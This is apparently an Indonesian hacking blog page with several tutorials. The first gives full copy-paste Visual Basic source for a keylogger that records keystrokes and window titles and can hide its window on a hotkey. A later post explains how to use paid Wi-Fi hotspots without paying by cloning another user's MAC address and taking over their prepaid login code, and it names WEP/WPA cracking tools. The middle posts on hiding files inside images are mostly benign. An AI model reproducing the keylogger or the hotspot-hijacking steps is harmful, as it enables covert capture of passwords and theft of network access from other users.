Sabtu, 02 Juni 2012

Membuat Key Logger Dengan Visual Basic

Sesuai dengan judul di atas, kali ini Ane akan memberikan sedikit tutorial cara membuat key logger sederhana dengan Visual Basic. Oke langsung saja gan CEKIBROTTT..
  1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
  2. Buka program Visual Basic
  3. New Project Standard EXE
  4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label (Lihat Gambar)
  5. Copas seluruh Code di bawah ini :
    Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
    Private Declare Function GetForegroundWindow Lib “user32″ () As Long
    Private Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hWnd As Long, ByVal sWndTitle As String, ByVal cLen As Long) As Long
    Private hForegroundWnd As Long
    Private backs As BooleanPrivate Sub Command1_Click()
    Timer1.Enabled = True
    End SubPrivate Sub Command2_Click()
    Timer1.Enabled = False
    End SubPrivate Sub Command3_Click()
    backs = True
    End SubPrivate Sub Command4_Click()
    backs = False
    End SubPrivate Sub Form_Load()
    backs = True
    End Sub
    Private Sub Label1_Click()
    End Sub
    Private Sub Label4_Click()
    End Sub
    Private Sub Label6_Click()
    Timer1.Enabled = True
    End Sub
    Private Sub Label7_Click()
    Timer1.Enabled = False
    End Sub
    Private Sub Label8_Click()
    backs = True
    End Sub
    Private Sub Label9_Click()
    backs = False
    End Sub
    Private Sub Text1_Change()
    Text1.SelStart = 0
    Text1.SelLength = Len(Text1.Text)
    End Sub
    Private Sub Timer1_Timer()
    Dim x, x2, i, t As Integer
    Dim win As Long
    Dim Title As String * 1000
    win = GetForegroundWindow()
    If (win = hForegroundWnd) Then
    GoTo Keylogger
    Else
    hForegroundWnd = GetForegroundWindow()
    Title = “”
    GetWindowText hForegroundWnd, Title, 1000
    Select Case Asc(Title)
    Case 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
    Text1.Text = Text1.Text & vbCrLf & vbCrLf & “[ " & Title
    Text1.Text = Text1.Text & " ]” & vbCrLf
    End Select
    End If
    Exit Sub
    Keylogger:
    For i = 65 To 90
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    If x2 = -32768 Then
    Text1.Text = Text1.Text & Chr(i)
    Else: Text1.Text = Text1.Text & Chr(i + 32)
    End If
    End If
    Next
    For i = 8 To 222
    If i = 65 Then i = 91
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    Select Case i
    Case 48
    Text1.Text = Text1.Text & IIf(x2 = -32768, “)”, “0″)
    Case 49
    Text1.Text = Text1.Text & IIf(x2 = -32768, “!”, “1″)
    Case 50
    Text1.Text = Text1.Text & IIf(x2 = -32768, “@”, “2″)
    Case 51
    Text1.Text = Text1.Text & IIf(x2 = -32768, “#”, “3″)
    Case 52
    Text1.Text = Text1.Text & IIf(x2 = -32768, “$”, “4″)
    Case 53
    Text1.Text = Text1.Text & IIf(x2 = -32768, “%”, “5″)
    Case 54
    Text1.Text = Text1.Text & IIf(x2 = -32768, “^”, “6″)
    Case 55
    Text1.Text = Text1.Text & IIf(x2 = -32768, “&”, “7″)
    Case 56
    Text1.Text = Text1.Text & IIf(x2 = -32768, “*”, “8″)
    Case 57
    Text1.Text = Text1.Text & IIf(x2 = -32768, “(“, “9″)
    Case 112: Text1.Text = Text1.Text & ” F1 “
    Case 113: Text1.Text = Text1.Text & ” F2 “
    Case 114: Text1.Text = Text1.Text & ” F3 “
    Case 115: Text1.Text = Text1.Text & ” F4 “
    Case 116: Text1.Text = Text1.Text & ” F5 “
    Case 117: Text1.Text = Text1.Text & ” F6 “
    Case 118: Text1.Text = Text1.Text & ” F7 “
    Case 119: Text1.Text = Text1.Text & ” F8 “
    Case 120: Text1.Text = Text1.Text & ” F9 “
    Case 121: Text1.Text = Text1.Text & ” F10 “
    Case 122: Text1.Text = Text1.Text & ” F11 “
    Case 123: Text1.Text = Text1.Text & ” F12 “
    Case 220: Text1.Text = Text1.Text & IIf(x2 = -32768, “|”, “\”)
    Case 188: Text1.Text = Text1.Text & IIf(x2 = -32768, “<”, “,”)
    Case 189: Text1.Text = Text1.Text & IIf(x2 = -32768, “_”, “-”)
    Case 190: Text1.Text = Text1.Text & IIf(x2 = -32768, “>”, “.”)
    Case 191: Text1.Text = Text1.Text & IIf(x2 = -32768, “?”, “/”)
    Case 187: Text1.Text = Text1.Text & IIf(x2 = -32768, “+”, “=”)
    Case 186: Text1.Text = Text1.Text & IIf(x2 = -32768, “:”, “;”)
    Case 222: Text1.Text = Text1.Text & IIf(x2 = -32768, Chr(34), “‘”)
    Case 219: Text1.Text = Text1.Text & IIf(x2 = -32768, “{“, “[")
    Case 221: Text1.Text = Text1.Text & IIf(x2 = -32768, "}", "]“)
    Case 192: Text1.Text = Text1.Text & IIf(x2 = -32768, “~”, “`”)
    Case 8: If backs = True Then If Len(Text1.Text) > 0 Then Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) – 1)
    Case 9: Text1.Text = Text1.Text & ” [ Tab ] “
    Case 13: Text1.Text = Text1.Text & vbCrLf
    Case 17: Text1.Text = Text1.Text & ” [ Ctrl ]“
    Case 18: Text1.Text = Text1.Text & ” [ Alt ] “
    Case 19: Text1.Text = Text1.Text & ” [ Pause ] “
    Case 20: Text1.Text = Text1.Text & ” [ Capslock ] “
    Case 27: Text1.Text = Text1.Text & ” [ Esc ] “
    Case 32: Text1.Text = Text1.Text & ” “
    Case 33: Text1.Text = Text1.Text & ” [ PageUp ] “
    Case 34: Text1.Text = Text1.Text & ” [ PageDown ] “
    Case 35: Text1.Text = Text1.Text & ” [ End ] “
    Case 36: Text1.Text = Text1.Text & ” [ Home ] “
    Case 37: Text1.Text = Text1.Text & ” [ Left ] “
    Case 38: Text1.Text = Text1.Text & ” [ Up ] “
    Case 39: Text1.Text = Text1.Text & ” [ Right ] “
    Case 40: Text1.Text = Text1.Text & ” [ Down ] “
    Case 41: Text1.Text = Text1.Text & ” [ Select ] “
    Case 44: Text1.Text = Text1.Text & ” [ PrintScreen ] “
    Case 45: Text1.Text = Text1.Text & ” [ Insert ] “
    Case 46: Text1.Text = Text1.Text & ” [ Del ] “
    Case 47: Text1.Text = Text1.Text & ” [ Help ] “
    Case 91, 92: Text1.Text = Text1.Text & ” [ Windows ] “
    End Select
    End If
    Next
    End Sub
    Private Sub Timer2_Timer()
    Dim a, b, x As Long
    a = GetAsyncKeyState(120)
    b = GetAsyncKeyState(121)
    x = GetAsyncKeyState(16)
    If a = -32767 And x = -32768 Then Me.Hide
    If b = -32767 And x = -32768 Then Me.Show
    End Sub
  6. Jalankan dengan menekan tombol F5
  7. Live demo bisa di download disini :
Selamat mencoba, Dan ingat gan ini HANYA UNTUK PROSES PEMBELAJARAN AJA YA!!!!

Cara Menyembunyikan File Dalam Gambar

Kali ini ane mau berbagi cara menyembunyikan file di dalam file gambar,music,video.pake winrar sih sebenernya udah aman dari orang lain maupun virus namun file winrar yg terprotrksi password dapat di bobol juga,nah kalo file di sembuntikan di gambar,music, atau video pasti lebih aman dan orang lain ga akan curiga dan pasrinya aman dari virus. caranya lumayan mudah,langsung aja ke TKP nya gan :
  1. Buatlah folder untuk meletakan file-filenya agar lebih mudah
  2. Jadikan file yg anda akan sembunyikan ke format rar atau zip (klik kanan pada file pilih add to winrar)
  3. Siapkan file gambar,music, atau video
  4. Simpan file gambar dan file rar/zip dalam folder yg tadi dibuat
  5. Buka notepad
  6. Copy code berikut : copy /b file gambar,music,atau video + file rar/zip nama hasil file nya (Contoh : copy /b apel.jpg + test.rar apel02.jpg)
  7. Save dengan format ” .bat ” dan simpan di folder yg tadi dibuat
  8. Klik dua kali pada file .bat yg tadi kita buat
  9. Cek hasil file nya dengan cara klik kanan pada file hasilnya lalu pilih open with , dan pilih winrar
Untuk lebih jelasnya silahkan download tutorialnya:

SELESAI
File anda sudah aman,selamat mencoba ya dan semoga bermanfaat
* Mari budayakan berbagi, Salam BinusHacker Family *

Menyembunyikan File Dalam Gambar

Apakah anda mempunyai keinginan untuk menyembunyikan file-file pribadi anda agar tidak bisa di lihat oleh orang lain? sebenarnya cara sederhana adalah dengan cara meng-hidden file yang ingin disembunyikan, tetapi cara ini ada kelemahannya. File tersebut bisa di lihat apabila seseorang meng-aktifkan fitur Show hidden files and folder pada menu Folder options.
Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
Pada trik kali ini kita akan mencoba menyembunyikan file rahasia ke dalam gambar dengan menggunakan Aplikasi Jpeg+FileBinder. Tetapi tetap saja kita membutuhkan beberapa program pendukung lainnya sepertiWinZip7zip, dan lain sebagainya, karena nantinya sebenarnya file tersebut menjadi bentuk kompresi tetapi seakan-akan menjadi gambar.
Langkah-langkah yang harus dilakukan:
  1. Untuk percobaannya, buat satu file dari notepad. Dalam contoh kali ini penulis membuat filefastncheap.txtTrik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
  2. Dilanjutkan dengan mengkompress file tersebut dengan WinRAR ke dalam bentuk ZIP. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
  3. Jalankan Aplikasi Jpeg+FileBinder untuk memulai trik penyembunyian file. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
  4. Masukkan satu file gambar yang ingin digunakan sebagai tempat persembunyian File rahasia pada kolom Pictures.
  5. Masukkan file yang ingin di sembunyikan ke dalam kolom Compressed File, ingat! file tersebut sudah kita buat pada langkah no 2.
  6. Pada Output Picture File, ketikkan nama yang anda ingini sebagai nama gambar yang akan di buat.
  7. Kemudian klik tombol OK. Maka akan tercipta sebuah file gambar yang di dalamnya terdapat file rahasia anda. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
  8. Untuk mencoba apakah trik ini berhasil anda bisa membuka file gambar yang sudah tercipta tadi menggunakan WinRAR. Klik Kanan pada file gambar kemudian Open With > WinRAR. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
  9. Segera kita dapat mengetahui isi file gambar tersebut. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image
Cara ini sebenarnya sangat efektif dimana bila seseorang melihatnya sepintas tak akan pernah berfikir bahwa di dalamnya terdapat file rahasia, karena gambar tersebut bisa di lihat melalui Microsoft Frame Picture akan tetap seperti gambar.
Tetapi bisa anda menyimpan file yang agak besar ukurannya, cara ini bisa sangat mencurigakan. Karena gambar yang biasanya pixelnya rendah mempunyai ukuran 100 MB karena di dalamnya terdapat file rahasia anda. Selalu gunakan cara-cara di atas dengan bijak. Trik Menyembunyikan File Dalam Gambar JPEG dan JPG Image

STEGANOGRAFI


Tutorial kali ini kita akan membahas teknik steganografi yaitu menyembunyikan sebuah file ke dalam file gambar. Teknik Steganografi ini kabarnya digunakan para teroris untuk saling berkomunikasi untuk merencanakan pengeboman gedung WTC. Dan uniknya lagi, teknik ini baru diketahui oleh FBI setelah beberapa tahun peristiwa pengeboman itu berlalu.
Sebenarnya teknik steganografi ini pernah saya posting pada tahun 2009 disini, tadi gak sengaja bongkar bongkar arsip di klikedukasi, eh ketemu lagi dengan teknik ini. Kenapa saya bahas lagi? Saya hanya ingin mencoba, apakah teknik ini masih bisa dilakukan dengan sistem operasi windows 7 atau gak. Setelah saya coba, ternyata masih bisa. Artikel ini juga sebagai penyempurna artikel sebelumnya, sebab pada tulisan yang dulu saya tidak menyertakan langkah langkahnya dengan panduan gambar. Mudah mudahan dengan adanya artikel lanjutan ini, bisa lebih mudah untuk dipahami.
Apaan tuh steganografi?
Menurut wikipedia Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia di dalamnya. lebih jelasnya bisa anda telusuri sendiri disini
Sederhananya steganografi merupakan teknik untuk menyembunyikan tulisan atau file ke dalam sebuah file. bingung yak?
Coba bandingkan kedua gambar ini, apakah ada perbedaannya?

Jika dilihat sepintas, kedua gambar tersebut sama persis, gak ada perbedaan sama sekali. Sekarang coba anda simpan kedua gambar tersebut ke komputer anda, kemudian bandingkan ukuran (size) kedua file gambar tersebut. Gambar sebelah kiri yang bernama klikedukasi.jpg berukuran 32,7 kb dan tidak saya manipulasi sedikitpun, sedangkan gambar sebelah kanan bernama hasil.jpg berukuran lebih besar dari gambar pertama yaitu 50,6 kb.
Anda bisa pastikan sendiri gambar di atas sama persis, yang membedakan hanya ukurannya. Kenapa bisa ukurannya berbeda? karena saya sudah menyisipkan satu buah file ke dalam gambar yang sebelah kanan.
Untuk membuktikannya gimana? Setelah anda simpan, coba anda klik kanan gambar yang bernama hasil.jpg kemudian open with winrar, atau bisa dengan cara merename nama hasil.jpg menjadi hasil.rar
Apa yang terjadi? anda akan melihat di dalam file tersebut ada file bernama logout.php. Nah loh keliatan kan ada file yang saya sisipkan. Oiya saya asumsikan di komputer anda sudah terinstall program winrar sebelumnya.
Trus bagaimana cara menyisipkan file ke dalam gambar tersebut? Sebenarnya sangat mudah, kita cukup menggunakan sedikit perintah yang ada di command prompt (CMD) windows.
Dalam uji coba kali ini saya hendak menyatukan file klikedukasi.jpg dengan file logout.php, nanti setelah disatukan akan menjadi file hasil.jpg seperti di atas.
Mari kita coba. ikuti step step berikut:
1. Buat folder bernama terserah anda, saya memberi nama folder ini steganografi letaknya di drive D:\>
2. Copy paste file gambar klikedukasi.jpg dan file php logout.php ke dalam folder tadi yang kita buat. Buatlah file steganografi.rar yang di dalamnya terdapat 2 buah file di atas. Biar lebih jelas saya kasih screenshot seperti di bawah.

3. Persiapan filenya sudah kita lakukan, kini saatnya masuk ke command prompt, buka cmd dengan cara tekan tombol window + R ketik cmd dan enter akan terbuka jendela command prompt seperti ilustrasi berikut

4. Masuk pada direktori tempat menyimpan folder steganografi tadi, saya menyimpannya di drive D, alamat lengkapnya seperti ini D:\steganografi
:: Masuk terlebih dahulu ke drive D, kemudian pindah ke folder steganografi. Caranya ketik pada command prompt D: tekan enter
:: Kemudian pindah ke direktori steganografi dengan mengetik cd steganografi akhiri dengan enter
:: Kita sekarang telah berhasil masuk ke folder steganografi, ditandai dengan adanya tulisan D:\steganografi>di command prompt.
5. Nah sekarang saatnya kita memnyatukan dua file tadi. gimana caranya? ketik perintah berikut:
copy /b klikedukasi.jpg+steganografi.rar hasil.jpg
Akhiri dengan menekan tombol enter. Gambar di bawah ini menunjukkan perintah yang kita gunakan dari langkah nomer 4 tadi.
Daaaaaan coba cek di folder steganografi kita, jika anda berhasil maka akan ada file bernama hasil.jpgdalam folder tersebut.Teknik di atas bisa juga anda gunakan untuk menyembunyikan banyak file dalam satu file gambar. Saya pernah membuat file sejenis ini yang di dalamnya berisi beberapa program dan beberapa folder, file gambar yang saya buat itu besarnya mencapai 76 MB.
SELAMAT MENCOBA GAN

Membobol Password Wifi Hotspot

Cara Membobol Password Wifi Hotspot (Internet Gratis). HotSPOT/tempat akses internet adalah Wireless dengan standard 802.11b/g. Nah bagi yang dah ga' sabar ke penjelasannya, silahkan baca

Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
Apa itu MAC Adress ?
Quote:
In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).
Kesimpulannya MAC Address adalah nomor unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.


Bagaimana menjebol Proteksi dengan MAC Address ? Ada sebuah tools yang sangat bermanfaat untuk anda. Tools itu bernama K-MAC.

Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali.

kracking password WEP/WPA/WPA-2 menggunakan program yang tersedia dalam paket OS backtrack yaitu

Kismet. Kismet adalah satu Tool security yang berjalan Linux, kismet digunakan untuk menyadap lalu lintas data dalam jaringan internet.

Aircrak-ptw. Aircrak-ptw adalah tool yang digunakan untuk meng-krack wireless yang diproteksi. Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan airkrack pun berbeda.

Trik yang satu ini juga dipakai untuk mencari password yang digunakan oleh seseorang untuk mengakses hotspot yang menggunakan kartu prepaid.
Alat yang dipersiapkan sangat simple:
- Seperangkat Laptop : PC yang ada wifi adaptornya juga bisa, asal jaringan hotspotnya bisa tertangkap.
- Charger laptop : karena pasti memakan banyak daya baterai saat keranjingan internet gratis (he....).
Software yang diperlukan:
1. Angry IP Scanner 2.21. 
2. Technitium MAC Address v5 release 3. 

Quote:
Langsung aja sekarang ke caranya:

# Cari lokasi penyedia layanan hotspot, tentunya di daerah yang terjangkau jaringan hotspot tersebut.
# Hidupkan laptop anda, dan hidupkan pula wireless network anda dan lihat di sistem tray icon wireless network, kemudian klik kanan dan pilih view avalible wireless network, dan tentunya setelah itu anda harus connect ke wireless hotspot tujuan anda.

# Setelah connect, klik kanan sistem tray dan pilih status >pilih tab detail > kelihatan disana ip yang diberikan kepada kita. Catat ip tersebut.

# Buka Program AngryIP Scanner 2.21 dan isikan ip range yang akan kita scan (pakai data ip kita tadi) pada bagian atas. Misalnya : IP yang kita dapat 135.125.1.13 kemudian masukkan pada kolom range pertama ip kita sesuai dengan ip yang tadi namun ganti angka di bagian akhir dengan 1 menjadi 135.125.1.1 dan pada kolom kedua tuliskan sama namun angka satu diakhir itu ganti dengan 255 menjadi 135.125.1.255. hasilnya 135.125.1.1 to 135.125.1.255 dan klik start (tombol merah).

# Setelah melakukan scanning maka kita akan mendapatkan data ip yang hidup yang terkoneksi dengan hotspot tersebut. setelah scanning selesai maka lihat ip yang hidup (alive host) warna biru klik kanan pada ip yang hidup Klik kanan pada ip yang warna biru tadi klik kanan > show > mac address dan akan ada kode mac addres (terkadang ada mac addressnya tidak tampil, pilih saja ip yang lainnya). Catat mac address yang kita dapatkan.

# Buka Program Technitium MAC Address v5 release 3 yang telah kita persiapkan. Disana ada field mac address. nah sekarang tinggal ganti mac address tersebut dengan yang kita dapatkan tadi dan tekan change mac id.

# Tunggu karena mac kita akan diganti dan koneksi sementara terputus dan konek lagi otomatis sendiri.

# Masuk web browser firefox atau apa saja boleh. Nikmati Internet Gratis…...


Satu hal yang perlu diingat adalah kita sistemnya numpang data transfer pada account yang kita hack tadi (yang punya ip tadi, pis om....).

Ini bisa di akali dengan masuk halaman status login hotspot tersebut (untuk dapat account). Misalnya idonbiu.hotspot.net/status dan begitu masuk disana kan terlihat nomor sandi prepaid card dan kita catat saja, lalu logout, dan masuk kembali ke halaman login hotspot itu cepat-cepat masukkan sandi tadi.
Hal ini akan membuat kita secara langsung dapat mengakses internet tanpa menumpang lagi (soalnya yang make prepaid card code kan kita) jadi kalau ada yang mau login pakai kartu itu (yang punya code) saat kita login pakai kartu itu tentunya dia tidak akan bisa masuk karena kartu prepaid cardnya "already login".

Bagaimana, menarik bukan ?
Tapi saya sarankan, seperti yang saya lakukan adalah dengan menumpang saja, karena saya tidak mau berbuat terlalu jauh, seperti cara yang saya beritau untuk me-log off dan log in lagi tentunya akan membuat sang pemilik tidak bisa log in. Kasian kan ?
Jadi mumpung sudah dikasih gratisan, kenapa gak numpang saja ya, itung-itung cuma ikutan ngakses bareng kan tidak terlalu merugikan. Minta ijin langsung juga kemungkinan yang punya gak nolak, asal kepentingannya memang mendesak.
Untuk Scanning Ip juga bisa memakai aplikasi Dude 3.5.zip. Untuk mengetahui kondisi koneksi komputer-komputer ke hotspot. Bisa dicoba juga ya..

Dan yang terbaru klo di hotspot pada pake wep or wpa pake ini aja barusan dicobain tembus euy…..

WEP and WPA keygenerator v1.00 atau Wireless Key Generator. Tinggal jalanin programnya trus generate,,copy aja langsung ke network key-nya…

Bisa juga dengan aplikasi "wifi password finder". Silahkan Search aja di 4*shared, jangan di YouTube (he...).

Bonus: Jika Anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat, Anda bisa melakukannya dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut. Hal ini dilakukan agar bandwith yang ada dapat digunakan dengan maksimal.

Quote:
Caranya seperti dibawah ini :

1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian pilih OK
5. Klik Administrative Templates
6. Klik Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply
12. Kemudian pilih OK
13. Terakhir keluar dari menu dan restart komputer.


Sekali lagi, semua ini hanya untuk pembelajaran saja, selama kita masih mampu kenapa gak pakai yang legal aja. Dan ini juga bisa dimanfaatkan oleh pemilik hotspot, kalau cara ini masih bisa digunakan untuk membobol. Jadi perlu keamanan yang lebih.

H4ck Dengan Kismet.

Tool Kismet ini lebih lengkap, tapi sayang tools ini hanya bisa berjalan di linux. Klo dah punya linux misal ubuntu bisa dicobain. Download kismet.

SELAMAT MENCOBA GAN